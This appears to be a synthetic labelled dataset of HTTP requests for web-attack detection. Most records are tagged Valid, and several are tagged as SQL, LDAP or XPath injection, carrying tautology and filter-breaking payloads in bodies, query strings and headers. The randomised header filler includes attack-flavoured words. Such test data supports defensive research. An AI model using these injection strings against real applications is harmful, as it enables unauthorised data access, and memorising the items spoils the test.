Client-ip: 43.245.129.81
Cookie: MEtDx6Ao=wxQUSamNo7a;VLtS_14b2V=sdc3slo2bArtwe7gg;EN0JDOtW=imnullr
Cookie2: $Version="502"
Date: Fri, 29 Apr 05 04:25:17 CET
ETag: W/"jLNj9bHyI@39fguC"
Expect: 100-continue
From: n30oip@sye2lHtos.gov
If-Modified-Since: Sun, 22 Feb 09 21:40:58 UTC
If-Unmodified-Since: Wed, 02 Sep 09 15:50:56 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 02 Sep 05 09:33:00 GMT
Max-Forwards: 146
MIME-Version: 5.5
Pragma: s0rb='sa1iwEsl'
Proxy-Authorization: aGeo uhioari5=RFiho
Authorization: eoLie oA8DtE=cia3d
Range: -5461,-03305,-419
Referer: http://nOoteoeo.uk/tr7haa/asTdi.rar
TE: trailers,chunked;q=0.8
Trailer: Connection
User-Agent: iit4h (tRjgPX)
UA-CPU: x86
UA-Disp: 133,828,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 488x0113
Via: 5.2 www.rzyIH.shtml, 1soteu/2.5 www.ycstn.jpeg, FTP/6.6 87.158.97.203
Transfer-Encoding: gzip
Upgrade: hosi/6.7, fne0e/8.7, zeue/7.8
Warning: 337 145.226.205.116 "slrtoretepnre" 
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 96974116
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 30183
Start - Id: 10831
class: Valid
GET /6b-/Z68UtNUpobject/i5l9rL7LXja6f4d9T.cfm? HTTP/1.1
Host: 177.200.67.244
Connection: keep-alive
Accept: video/*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=751
Client-ip: 252.10.137.35
Cookie: gW@wIV=h-Kij0kJLz;ostarNai34nvtt=esh;apvcRaguacnm=548823
Cookie2: $Version="335"
Date: Sat, 03 Jan 04 19:59:35 GMT
ETag: "PK3gNNt4OaCsMfwCt1h"
Expect: raar=iheyH;t1kqs
From: oamhlso@nd4Isktc.be
If-Modified-Since: Sat, 05 Jul 08 10:59:54 GMT
If-Unmodified-Since: Sat, 19 Jun 04 04:43:51 UTC
If-Match: *
If-None-Match: "KGJYu5@1UyyPQtdqfMoD"
If-Range: Sun, 26 Jun 05 12:16:53 GMT
Max-Forwards: 387
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: NTLM bGRoYWlzQXJ0bmhzYzhrZDVubWthYXNzdWtzZG90c296YW1lc1lyZWRjZWNwZW4=
Authorization: NTLM Y25wbG1rcnM0ZW5paWV0ZUV0YWI0dGVscmRCZThyNW9jSGU=
Range: 617034-,793-
Referer: /Ohnet/cvarwgc/odSlrk.aspx
TE: trailers,chunked,trailers
Trailer: Accept-Encoding
User-Agent: kwgE (nUdoYqY5Ri)
UA-CPU: StrongARM
UA-Disp: 7212,6532,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 633x671
Via: 6.9 118.163.215.183
Transfer-Encoding: utmt; il5et=etaaPm
Upgrade: 3uen/0.9, a1ts/0.4, sidhd/7.5, fsam/4.5
Warning: 075 25.192.228.24 "beDnei0R4e" 
X-Forwarded-For: 96.51.246.201
X-Serial-Number: 67477074905757
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10831
Start - Id: 15258
class: Valid
GET /ane0cn6e4/s_Oa-niUCO69uOH/3are6srtbeagi/GVG_CO9cLF/knne.jpeg?n@Vo8T3jUd=77017&IaLgA74x=y1nsock_streama%5D%7Clinkzdnhvk4m%3C&aaG9o9lEd=hPQV- HTTP/1.0
Host: 20.104.46.142:80
Connection: ioLF
Accept: */*;q=0.3
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.6, gzip;q=0.1
Accept-Language: lam-euh;q=0.4
Cache-Control: no-cache
Client-ip: 146.193.75.117
Cookie: clga=sVx;phvEsOh3hojdit=010;eoehtdspa=5;niotPodeerGTpra=n?3st8ewItd;owtm=ticlntd12
Cookie2: $Version="895"
Date: Tue, 01 Aug 06 15:59:00 GMT
ETag: W/"Cygi3fqm9GyaWa2"
Expect: 8oNm=hcoe0
From: aecg@hens.de
If-Modified-Since: Thu, 27 May 04 16:04:58 GMT
If-Unmodified-Since: Sat, 18 Dec 04 14:39:32 UTC
If-Match: "P8DD8O_z2t4AUG@rd"
If-None-Match: *
If-Range: *
Max-Forwards: 521
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: vt6o Ret2w3r=bHEdy
Authorization: 4trt5h nPcmf=iygshc
Range: 70862-
Referer: /maeor1.css
TE: deflate;q=0.1
Trailer: If-Unmodified-Since
User-Agent: ok9ayuM http://www.tEemy.uk
UA-CPU: PowerPC
UA-Disp: 661,7320,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 175x9558
Via: HTTP/5.3 www.aIlmnns.js
Transfer-Encoding: deflate
Upgrade: 3mbtt/4.9, e4asi/7.0
Warning: 019 www.wlaLP.png "ndRtmrHiahcCIolrn" 
X-Forwarded-For: 231.138.207.226
X-Serial-Number: 82459741903687
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15258
Start - Id: 37827
class: LdapInjection
GET /nneiert.png?eensizw=LeeAitntrxrnug&neOeouurwwa=m7z6%40_f8DD&eer7ha9etssnsnr=phpc&neoleatiecQ=73&sb=10820756&Cyefqmoiops=i6Z3jz9dOT7&3hhd2s7=bFndfli-E9t&deNhou=spfboZU%40nd4&sE4LElta=tysM%29%28+%7C+%28Eomcn%3D*%29&hrvm=Rignai&o5lsomcni81ro=ay&eno=ahmoStnOwrkr8er&tehwi2qsi=eE%3C%7EAhitm8tm&ctmpJFEzKopen=53913 HTTP/1.1
Host: 166.106.104.179
Connection: 8ia5
Accept: application/zip, video/quicktime;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: thtrCt-dNtgwa;q=0.0, dPcmgd-kln;q=0.4, ewa-aimstsi;q=0.1, LvydetAL-ie
Cache-Control: only-if-cached
Client-ip: 61.159.20.181
Cookie: nklt=asuje;evozecoeqaH=4114211;ae5ns=N;p62egn8rdtefg=tcI6;toncrdbytaquor=2993635350;j9wgetTsS=6526805
Cookie2: $Version="74"
Date: Tue, 25 Mar 08 17:41:28 CET
ETag: "Ob3LephYBYDp-6jiyC"
Expect: 100-continue
From: utTT@sw41.ch
If-Modified-Since: Wed, 27 May 09 06:51:16 CET
If-Unmodified-Since: Thu, 25 May 06 08:04:45 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 12 Feb 05 05:48:51 UTC
Max-Forwards: 525
MIME-Version: 6.6
Pragma: eL='i'
Proxy-Authorization: Digest realm
Authorization: eet7 ianHaao=dtbal
Range: 09106-2,27777-,7807-
Referer: /steeby.avi
TE: trailers
Trailer: Host
User-Agent: dQSnfSGGI. http://www.o9whfid.st
UA-CPU: 68000
UA-Disp: 825,0985,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: FTP/5.4 www.aetonsd.htm, HTTP/1.3 www.ttos.png, FTP/7.5 www.OrOnsee.jpeg
Transfer-Encoding: identity
Upgrade: twrizf/4.9, ra8dl/9.5
Warning: 166 78.105.41.24 "sewleo7lheo" "Tue, 16 Jun 09 20:36:56 UTC"
X-Forwarded-For: 178.127.38.107
X-Serial-Number: 839362517955093673
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37827
Start - Id: 26180
class: Valid
GET /cCT5IaD.tDlHkk@PhQ_s/2sVsrs5Sz9JZZc/rLfhssuie49iphtemis/rmne/h-L_0lgQ5jpKUzVsf1Jm/WeceeiArnnA/rnciophn5n/4@zTXYTi8.FjUlinkM/imul/r6uhnt5qe1nFRi4y2.mdb?xons0h5osd3n=33563419&fug16uHhL=ruXunvX&dE4MU0lLPIdropy=70504&TglsvarvuHzg6mN=phpnH&uam0aoptIieFgR=U%5Dt&texewcutg=69&eaSemooz8=9093094&frsn6aa4=Eysvxar+httpsbA&phpAZ2=1e&lbeif0ure8w0=ttrhttgr+Smu HTTP/1.0
Host: 182.238.119.127:08052
Connection: 39Imascc
Accept: image/*;q=0.2, image/jpeg, text/*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: lutczl-rl6;q=0.8, 3-e, iHev-oya
Cache-Control: ep=tsblaG
Client-ip: 2.25.83.104
Cookie: 7hrton=72;eapeNweti=iKbY;rSea1UOuonee=91;te=65;znLeenvjhy=thN n'8nhavingacceptzoFah@9
Cookie2: $Version="4"
Date: Thu, 25 Sep 08 11:55:35 UTC
ETag: "e@RcipIjTL5_OjCc_"
Expect: Envid=d7Ic
From: k64yl@itTpiyl.org
If-Modified-Since: Thu, 11 Feb 10 24:39:18 UTC
If-Unmodified-Since: Wed, 02 Sep 09 06:31:32 UTC
If-Match: "wZiSmpDUxZTNCLG"
If-None-Match: *
If-Range: "@OsH5gfLnLOxj4qdd80j"
Max-Forwards: 43
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic ZWljdW06aDdkSW8=
Authorization: NTLM bmxHNG95cHN0b2F5Y3Jpc3Nlb21oZW9lZm81bnJuM2x0RTlwb3J1c2VpbXU4Mw==
Range: 9164-,-37
Referer: http://ey8rncln.de/itiH/hEaen/duijtit/crn7/thii.msf
TE: gzip,chunked
Trailer: Proxy-Authorization
User-Agent: omLmM5 http://www.adoyktr.it
UA-CPU: x86
UA-Disp: 048,473,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7580x3767
Via: FTP/1.2 13.255.62.82
Transfer-Encoding: gzip
Upgrade: ehiiB/7.2, yq3zM6/2.7, cdle/0.9, toodwq/0.1
Warning: 091 41.251.186.23 "rRst8cre" "Sat, 21 Feb 04 24:26:15 GMT"
X-Forwarded-For: 96.52.7.26
X-Serial-Number: 77624336
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26180
Start - Id: 33610
class: Valid
POST /VVE/akgpw/anHOBNtepfsaahyihsed/zVwindow.openAWhtpassYK9dg/gebdcZNtiG@ee/e8b/fethAisiehRldI3/jIK/lhttpDmchildwdas4.css? HTTP/1.0
Content-Length: 245
Content-Language: te,ettmcs
Content-Encoding: identity
Content-Location: http://gte2sv.com/lnSht/ntrSS/aeuvdnnz/owete.mdb
Content-MD5: dWFlMm5sM2FuemlxbnRlYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 10 Dec 08 08:51:37 CET
Last-Modified: Tue, 22 Feb 05 21:08:29 UTC
Host: www.tpmn0fnde.fr
Connection: keep-alive
Accept: application/x-tar, video/mpeg;q=0.8, video/mpeg;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: identity, deflate
Accept-Language: *;q=0.0
Cache-Control: max-age=58
Client-ip: 93.241.118.177
Cookie: Rhas2=e servicesn;30DinputtJboot.ini=r]Es?;omb2rmsRNo=eSxMviU9U;ashnhrn4femg=n+n;zPjh1connectCJYV=gesehl8orrmrIitu
Cookie2: $Version="82"
Date: Tue, 23 Mar 04 22:49:07 UTC
Expect: 09mhtnBl=aFdo7s
If-Modified-Since: Sun, 28 Nov 04 14:35:27 CET
If-Unmodified-Since: Thu, 22 Jan 09 09:49:28 UTC
If-Match: *
If-Range: Wed, 18 Apr 07 03:40:35 UTC
Max-Forwards: 023
MIME-Version: 0.2
Pragma: cwni8=th
Authorization: Digest nonce
Range: 409459-7,-297771
Referer: http://hli0c.it/E7fDc/epaN1a/lotdt/crraU/lcdeeha.mspx
TE: deflate;q=0.2,gzip;q=0.9,gzip
User-Agent: Mozilla/8.0 (Machintosh; U; PPC 1.7; 1u-hn; rv:3.7.7) Gecko/06801601
Via: nir9/4.4 www.3eta.gif:0, adn/3.5 232.56.51.75
Transfer-Encoding: compress
Warning: 832 www.ehihKame.gif "khIC0" 
X-Forwarded-For: 246.11.40.158

wtedtadgoa=600567&cssrnhtgemsbx=iOtoPniooEtmohe&aee=817821&sRtiTfoiwH=f &OnhesEwUh=i0sAb5&socrn=yiiH&.rGnfmzbselectM=9otees0Seutoe&2tictm= ix4xne7&r5mdd13ehnteebe=tntu7h slike0danuniontstdin&aJcc.-vhiL=elDOGhN&3grnntdid=rete&_7y6idjUVB=936028183

End - Id: 33610
Start - Id: 41442
class: SqlInjection
POST /fRH0A-VaibAfcoE8cZM/aaeo6Wewhanlhn0i/eeux7/yv9t-_WMP2z9DQoVqHM/oUAvNWgqPqDdeE/2JI8s9@1G/rf8pZzmCQtelnetsock_streamZnetcatL/rcaiDa.swf? HTTP/1.0
Content-Length: 322
Content-Language: gsm
Content-Encoding: compress
Content-Location: http://www.wuuoon.be/gufn0/st0n/b5gshsh.php4
Content-MD5: QWJVeWl2dGR1OWNudXNSNg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 21 Apr 05 01:12:15 UTC
Last-Modified: Mon, 30 Nov 09 04:09:04 GMT
Host: 118.134.241.155
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: hsh-b
Cache-Control: Rviroi=3o
Client-ip: 166.4.252.29
Cookie: wiandwsts=8997733;puAEljhet=p/NreplaceSeannso$mrg;ea5ti57dp=:olikesswr nupdatelto&ey;X3NMU=gnysn;esrnQ47wnAuuo=vLc;2y=osock_streama
Cookie2: $Version="9"
Date: Wed, 02 Jul 08 17:11:39 GMT
ETag: "leLIR_bfgo22sOQ"
Expect: wObo=kcnn
From: svetgtH@ellbmBnam.fr
If-Modified-Since: Thu, 08 Jun 06 17:27:45 GMT
If-Unmodified-Since: Tue, 06 Oct 09 09:16:45 UTC
If-Match: "LksjpT9Vqso3VodlRT"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.qaseCc.net/doze/ikttvm/5wrye.js
Authorization: Digest realm
Range: 78106-77620,1196-
Referer: /eronwedd/easyh/d6aeaz/asnent.nsf
TE: deflate;q=0.2
Trailer: Date
User-Agent: Mozilla/5.9 (Machintosh; U; Mac OS X 4.9; de-mn; rv:9.0.4) Gecko/26552026
UA-CPU: MIPS
UA-Disp: 5047,1180,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 738x118
Via: HTTP/4.8 14.7.10.11, 5.6 76.230.3.218, lka/0.4 www.ye7aetr.gif
Transfer-Encoding: compress
Upgrade: oin5s/2.1, itrt/4.7, tsm/7.1
Warning: 671 145.233.120.251 "tiua3dtweorond5gt" 
X-Forwarded-For: 243.251.179.229
X-Serial-Number: 9168693821015244526
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

yjeestbu3dt=7&ameixti=Rformtcopy&tea9senouae4=hrqmt97nG&.VG5os=3736414&s837eEf0ey=620807&ahlsoxttssot2o=35717556&8objectA64536kx=4995482&uuAdir='     /**/ OR   /**/''  =   '&J9uoQGgroup by=5071201&Rlmphar8pef0jm=i1htaccesomc>rudelete-esd&bhiepacllqr= W&pra=0&npuoyxheae2wp=4&trs=eg3&o8en=@9zreallsqhm

End - Id: 41442
Start - Id: 21188
class: Valid
GET /am/neash3ermenLMTwfrca.asmx?5weoOr=lwaX5P4&lgo8=eBd4%402&Omta=aeovoathspsauoo&n0tRu=hrrbGueaibgidir6&ssed=t+Ogh&k5fEoIlype0=seetceaauhe HTTP/1.1
Host: 252.191.165.194:1077
Connection: pn0tn
Accept: application/*;q=0.1, application/*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 201.72.152.249
Cookie: ieudttItt=oehbin;sloznnhusrn=j;GQR2yD=oOotyina9r ihcat;Kehcur4wsvw=eo(\ nrzro
Cookie2: $Version="06"
Date: Fri, 17 Aug 07 16:00:35 CET
ETag: W/"Sh1rWKHA9hHBbqXV@"
Expect: eCgea=etcnv;nHHl1c=trntA
From: aetfaus@nbciblTus.fr
If-Modified-Since: Sat, 29 Nov 08 15:49:19 UTC
If-Unmodified-Since: Tue, 02 Oct 07 21:47:24 UTC
If-Match: "VdWz6KpH8sgTZyx9b"
If-None-Match: *
If-Range: "jckmXD@yU9korAcid"
Max-Forwards: 604
MIME-Version: 3.3
Pragma: cl=demser
Proxy-Authorization: Digest realm
Authorization: Digest uri=http://tfc1ys.gov/snoo/iaetEu1/ntr8eT/turrled/sntcNrm.pl
Range: 85-737,54-2,-6
Referer: http://u2ete.biz/inzs/ha2goia/Eeeaiyad.php3
TE: chunked;q=0.1
Trailer: Authorization
User-Agent: iaNgwofbeuatoa
UA-CPU: PowerPC
UA-Disp: 158,905,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 402x543
Via: HTTP/1.8 www.sldht.tiff, 7.3 www.ebhlIsCC.html, FTP/3.8 www.izhaq.tiff:53916
Transfer-Encoding: identity
Upgrade: chbe/2.5, xmftad/6.6, onB/0.8, 0rtx/8.2, 3oDEvt/5.6
Warning: 287 www.ooron.jpg "eAsefYqn5etca1m" "Tue, 14 Dec 04 10:34:10 CET"
X-Forwarded-For: 105.99.66.229
X-Serial-Number: 041648335
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21188
Start - Id: 4509
class: Valid
PUT /passthruZ@devaluNlF/nUXksR/ycjfrth/tKbuD.E.shtml? HTTP/1.0
Content-Length: 71
Content-Language: teal,yt
Content-Encoding: deflate
Content-Location: /entoi/ukcomu/s9ot7r/eishu/e2lws1.swf
Content-MD5: ZW91U0FvY2VmZWRvZXNubw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 13 May 05 11:48:47 CET
Last-Modified: Sun, 19 Feb 06 23:01:39 CET
Host: www.rtrc5dc.uk
Connection: wve8en
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: deflate, compress;q=0.1
Accept-Language: yponotns-w1i;q=0.2, sg92ahen-rzcootEh, aeoep-con, wtT4Ur-slkaaq;q=0.9, hainru5n-LtwngUe
Cache-Control: only-if-cached
Client-ip: 211.161.242.52
Cookie: niialathf=eelraeoUu0;htrbiheaaai=cdivyrb)3Dtlw;nN0h8hhb0bKp=e6jPwrJA_qG;access_logk3ciSTeDELG=283;sytof3=7346974
Cookie2: $Version="195"
Date: Fri, 16 Oct 09 08:08:02 GMT
ETag: W/"FmO6gXImXaVVwhaW4p6@"
Expect: nfe4e5i
From: de2hc@aRyTe.gov
If-Modified-Since: Sat, 14 Aug 04 15:20:02 UTC
If-Unmodified-Since: Wed, 10 Oct 07 18:56:20 UTC
If-Match: "K6j.AhOLD3bIBxa8V"
If-None-Match: *
If-Range: Thu, 07 May 09 10:52:10 UTC
Max-Forwards: 041
MIME-Version: 5.0
Pragma: wna=sa
Proxy-Authorization: d6nso iofjtqph=imodlsXg
Authorization: Basic dnlzbWFsOnRyc25uaHQ=
Range: 48-
Referer: /nnisxts/8emie/nsht6hd.sh
TE: deflate;q=0.2,trailers
Trailer: Trailer
User-Agent: Mozilla/4.4 (compatible; MSIE 2.9; Win 9x; jDxiE)
UA-CPU: PowerPC
UA-Disp: 9080,142,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 187x310
Via: 2.8 111.109.105.80, HTTP/0.0 www.sft4.png, 5.1 www.7ulq.png
Transfer-Encoding: compress
Upgrade: aensr/9.0, tag/3.6
Warning: 842 189.66.165.24 "ccUelchs9dtqh" 
X-Forwarded-For: 165.210.32.151
X-Serial-Number: 94649830551806
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

8d6IinwdeiFdcv=nYann&EZf=0965&0umaf6nov8eo=eae&ybcnd=nhblei&j-mZl_SSz=3

End - Id: 4509
Start - Id: 32300
class: Valid
GET /nqWW6hlPWj4flz/gDguenNpHe7agmmsrb/reln3e/fmJUZcpoW/uon6kneno/5ot/620/wdmar/d2as.bin?0lheLhhiezon=1689399661&zfhIpIa=5iohnsi&eewoc=sNrhaai%3A+vekhe&eaex=d__&oe=8&.IWtlgPbYr=lk9qokDgr&wcnt7dtsaexjrhn=sdc6ohnMha&ioysnjeevtrg=ad%7E&h1Tj=erihvoptEpwdd&ntefReadcmiEAm=768263&ELGm0iframeB=d%2Fhttpcreass3ei3Lh%3Fcc%3B&juueTocacpi=%5Ct HTTP/1.1
Host: www.tD8rQjzw0.be
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: e09r=9ir
Client-ip: 78.90.197.80
Cookie: dDotrxetedosE=363201375;izoh=28043;xQmochabD9PPQMH=63;aTIrnHinCoh=th;8execQm= nnrhMoHy
Cookie2: $Version="501"
Date: Mon, 07 Feb 05 15:52:20 GMT
ETag: W/"PwGVrzKVjv.b6qx3Q"
Expect: 3zih
From: dyhd@dppe.gov
If-Modified-Since: Sun, 15 May 05 07:37:18 CET
If-Unmodified-Since: Fri, 23 Apr 04 19:30:35 GMT
If-Match: *
If-None-Match: "Hp_VkNkF4gd7o7GT10uB"
If-Range: "jfpc16BaOYBvoDtgZ"
Max-Forwards: 7985
MIME-Version: 9.5
Pragma: mp0i='hcr2'
Proxy-Authorization: eqcroe eh0ts=bnu9dnt
Authorization: NTLM b2FpZThlZXhkaHgzYXdhdWlyaGVuamh5ZG9JZlNrc3lsdTBBZG5IaWVBbg==
Range: -81,-436508
Referer: /ht4a8/Zy9ep/we1oe4.swf
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: si7amavd/2.0.3
UA-CPU: PowerPC
UA-Disp: 096,809,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3225x292
Via: ORsO2i/0.4 www.e8aieol.html, FTP/6.1 www.rexezmn.shtml, 9.2 www.twlar.tiff
Transfer-Encoding: deflate
Upgrade: isLo/1.1, ii6oo9/3.4, yei/5.6
Warning: 144 36.5.81.66 "nisieeaPsv62Lonttai" 
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 298337
----: ------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 32300
Start - Id: 30325
class: Valid
GET /t4LlCp8W41IH-B5BrJ/cINq/baae/dk6uel/sobtpslh/htJUHbt1yItta/feeofxDcgncx/0maCps/eM/aG4DH6P88z/r3/NAfen4matgE0tnpMer.asmx?neoa=zv+oie+e%3A0a&ldalataee7shTNf=119155204&IubhReu=sz%3Ferr&enirneR8et=4965&6i3cnxo8d=+n9&Onewiielo2tdi=y-%40RvJBov&0uee13aeehdesuq=oIse0aacfsf&os1weog=559 HTTP/1.0
Host: www.e8tr3si.be
Connection: keep-alive
Accept: image/*, application/*, application/*
Accept-Charset: iso-8859-9;q=0.6
Accept-Encoding: gzip;q=0.2, gzip;q=0.1, compress;q=0.5, deflate;q=0.5
Accept-Language: *
Cache-Control: max-age=97
Client-ip: 55.72.70.181
Cookie: icqlbgi=05585;metoiptvomei=999;1ioxe=5833;s2nOdted2aztirM=ehIRb0;TtcivETzes=bc;fhbpasswdhVNlinknX3D=2363
Cookie2: $Version="1"
Date: Sun, 09 Mar 08 11:14:50 CET
ETag: W/"uaTGlGF-qbMung2oH"
Expect: 100-continue
From: rddr@loSah.st
If-Modified-Since: Sun, 20 Apr 08 11:55:22 GMT
If-Unmodified-Since: Mon, 13 Feb 06 04:25:28 UTC
If-Match: "2TNoZ_VX93PUmncWFC"
If-None-Match: "9riHZzKimkzNofH0WR"
If-Range: Mon, 02 Jan 06 03:58:44 CET
Max-Forwards: 684
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM eEdyZXdraHJBZWFsY1FjaGhpc2xlM25pdEVPYVJzY2RkdFNnZXR0bnNuZmFud20=
Authorization: Basic aUlwdDpjYmR1
Range: 3-440226,69-6
Referer: /jotueso/i3eottr/twshrii/sywltE.wav
TE: trailers,deflate,chunked
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.5 (Machintosh; U; PPC Mac OS X 3.0; H5-tj; rv:3.6.4) Gecko/79896620
UA-CPU: 68000
UA-Disp: 2673,3726,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3971x442
Via: hkhtj/9.0 54.73.185.162, HTTP/2.2 132.19.202.1:123, HTTP/5.4 208.127.63.24
Transfer-Encoding: compress
Upgrade: iure/4.9
Warning: 232 99.201.159.8 "oAqfnetTzahmyttdf" "Fri, 04 Jul 08 05:10:09 UTC"
X-Forwarded-For: 209.241.65.202
X-Serial-Number: 60742
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30325
Start - Id: 50009
class: XPathInjection
POST /i7vIc7Q5xM3Pox/vyggaq/Ha.bin.K/eswdegMeihtatgjde/Tu3zdecaekmaac/ztnhiu/Am6/phuraeeedlrh/e-rcpvvarS/_m0QfFlink.php? HTTP/1.1
Content-Length: 80
Content-Language: ispjn6l8,tkt,Yaaeho
Content-Encoding: identity
Content-Location: /ebjs/rnaa/ottioshp.mpg
Content-MD5: ZWNlY3JqYXdwYWQxb3N1bg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 19 Jul 09 20:22:30 GMT
Last-Modified: Fri, 03 Feb 06 02:08:46 GMT
Host: 81.187.11.217
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 4106     or     count(path/child::node()[position()=((i+j+k+l+1)]     |  path/child::*()[position()=(k+1)])=1     or   94712=
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 119.180.39.9
Cookie: qHi=r2mkjaw;rkEde0csl9ceD=2i
Cookie2: $Version="26"
Date: Wed, 20 Dec 06 14:08:57 UTC
ETag: W/"gsue5mRwPlF@enuXpd"
Expect: 100-continue
From: Ecil@targ.fr
If-Modified-Since: Thu, 08 Apr 10 10:25:26 UTC
If-Unmodified-Since: Thu, 23 Aug 07 04:06:21 CET
If-Match: "-WSQhfbWZgaBVA9npd"
If-None-Match: *
If-Range: "Y5xw@QZ.lyASgcJA8"
Max-Forwards: 6
MIME-Version: 7.6
Pragma: pe='i'
Proxy-Authorization: Digest opaque="Esaae"
Authorization: Basic aGNYZExlOmF3dWFkTmk=
Range: 1-0902
Referer: /nEnS.doc
TE: trailers,trailers
Trailer: If-Match
User-Agent: nainrr (jmWbWB; sECQq@; uJ6XIXWTs; sLJ5DdK)
UA-CPU: x86
UA-Disp: 5539,6840,32
UA-OS: Solaris
UA-Pixels: 957x1532
Via: HTTP/8.6 www.WlwhaUB.css:33772, 2.1 www.ktgovd.jpg, HTTP/7.9 www.tsnnaaen.gif
Transfer-Encoding: compress
Upgrade: ihrzto/2.6, omrie/3.9, eairtL/8.4, nh9aUe/7.3, nbnau7/0.7
Warning: 530 www.qhehor.gif:76 "9eueIrtmcdq6tn" "Wed, 30 Jan 08 10:22:21 CET"
X-Serial-Number: 1430325
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~

FjTJ=lasseSErnnj&6ietdesupd7olpE=1Hscript&5otsaxtp9ha=evalid&D1leoyaa5geopT=1352

End - Id: 50009
Start - Id: 7918
class: Valid
PUT /coapktHAecHadggdt/Ylz8rlcN_7Yx7R/arihanetMerryy745sw1/aj1J.VCsAqqX4BsOcwUi/0dYn-.exe? HTTP/1.1
Content-Length: 209
Content-Language: atn
Content-Encoding: compress
Content-Location: http://www.eu6ooy.be/c42ei/caei/cCaEColm/irhu/3tdY.tiff
Content-MD5: Zm9hbHdldW8zaHQzaW90aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 19 Dec 07 17:51:59 UTC
Last-Modified: Sun, 16 Aug 09 09:59:23 UTC
Host: www.g7mowe2ty.biz
Connection: duhuIotr
Accept: image/*;q=0.8, audio/x-wav
Accept-Charset: cp-932;q=0.4, iso-8859-8;q=0.2, x-mac-icelandic
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-transform
Client-ip: 107.74.194.4
Cookie: sBhtnm5a=10472;5wEU21=aen4ysd;bf3xane=a1e6iNbn2oqlraiin;esjncFoe=uu;Awerolrutegena=Hosttsa
Cookie2: $Version="56"
Date: Thu, 07 May 09 22:18:48 UTC
ETag: W/"3264AWcrK@ctMTu"
Expect: s08o8ni
From: ef1i1ii0@9rAe.st
If-Modified-Since: Sun, 09 Oct 05 10:09:47 UTC
If-Unmodified-Since: Wed, 14 Apr 10 06:54:23 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 23 Nov 07 14:52:09 UTC
Max-Forwards: 1
MIME-Version: 6.9
Pragma: oPsot='w'
Proxy-Authorization: Digest username="sceiDcRc"
Authorization: pmrc 8oQopndO=ibcet
Range: 662168-
Referer: /ndnseV/oomOr8or/erot/ldTge/t5cat8g.png
TE: trailers,deflate;q=0.9,trailers
Trailer: Host
User-Agent: Mozilla/8.2 (compatible; gso3br8; Open BSD i386; sflClbw)
UA-CPU: StrongARM
UA-Disp: 9422,2675,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 487x7620
Via: HTTP/6.4 www.yreqa8vo.css, 5.9 www.rnR062yg.html
Transfer-Encoding: identity
Upgrade: 9cs/4.0
Warning: 977 149.105.53.80 "sbonttde" 
X-Forwarded-For: 179.151.107.237
X-Serial-Number: 534170749
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

oe4h=o_zSIGEJqN@M&tSitdarGethe=649111&d6r=mtez]s&ttn=7k9lhhpeybnumh9ne&emnstexbl4s=5821&nASau=n ml0tE-iievaliier&a4stToiwpohpem=tRydQ4g&is=eusiuiIau2sadminbp&or=ss&tHbrx=213694&nen=tsdnvmrdd3iNh&6em=032819

End - Id: 7918
